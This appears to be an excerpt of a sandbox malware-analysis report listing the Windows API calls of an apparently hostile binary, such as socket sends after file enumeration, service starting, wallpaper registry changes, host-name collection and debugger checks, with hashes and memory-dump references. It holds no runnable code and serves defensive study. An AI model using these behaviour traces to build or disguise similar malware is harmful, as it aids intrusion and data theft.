                                                  • Opcode ID: ed5127cdc400e90a0cd04182132ef1189bad1dc249964083a3aeb657203f5d4f
                                                  • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                  • Opcode Fuzzy Hash: ed5127cdc400e90a0cd04182132ef1189bad1dc249964083a3aeb657203f5d4f
                                                  • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474F08,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404E38
                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404E43
                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(00000000,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000,00474F08,00404AC9), ref: 00404E4C
                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  • Opcode ID: 862c59022daad431d23628330ba516582b459db47a78e5b736e8d9b7d2746a34
                                                  • Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
                                                  • Opcode Fuzzy Hash: 862c59022daad431d23628330ba516582b459db47a78e5b736e8d9b7d2746a34
                                                  • Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: 14acc013994ea39a2bbc43523691f2b3325a24eb13d4099d474cf43cb0341c91
                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                  • Opcode Fuzzy Hash: 14acc013994ea39a2bbc43523691f2b3325a24eb13d4099d474cf43cb0341c91
                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: 8eF$hPG$hPG
                                                  • API String ID: 4113138495-2076665626
                                                  • Opcode ID: cfbfcf718079cf0b4644ff624902380305b03c80622dd064ec620d6da3c06dea
                                                  • Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
                                                  • Opcode Fuzzy Hash: cfbfcf718079cf0b4644ff624902380305b03c80622dd064ec620d6da3c06dea
                                                  • Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: ,aF$Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3126330168
                                                  • Opcode ID: 197e130bdaf7109cecb9f3ea3caab49e05abb910f5c4b8a5bbb7898c35132e4a
                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                  • Opcode Fuzzy Hash: 197e130bdaf7109cecb9f3ea3caab49e05abb910f5c4b8a5bbb7898c35132e4a
                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                  • Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
                                                  • Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                  • Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: a5edd06a3f900acb76634a43e72e1477ac02ef7c7cb698dffaf8135e31ae31ef
                                                  • Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
                                                  • Opcode Fuzzy Hash: a5edd06a3f900acb76634a43e72e1477ac02ef7c7cb698dffaf8135e31ae31ef
                                                  • Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FSE$FSE
                                                  • API String ID: 0-1826177230
                                                  • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                  • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                  • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                  • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: p'E$JD
                                                  • API String ID: 1084509184-908320845
                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,0Q), ref: 0041B6BB
                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID: 0Q
                                                  • API String ID: 4229901323-1780094543
                                                  • Opcode ID: e75705911cc2a0b46837e609ad128fde2e6df1d534e004a7f5bb61fdffa7900c
                                                  • Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
                                                  • Opcode Fuzzy Hash: e75705911cc2a0b46837e609ad128fde2e6df1d534e004a7f5bb61fdffa7900c
                                                  • Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00000000), ref: 004338DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002,00000000), ref: 00443376
                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002,00000000), ref: 0044337D
                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
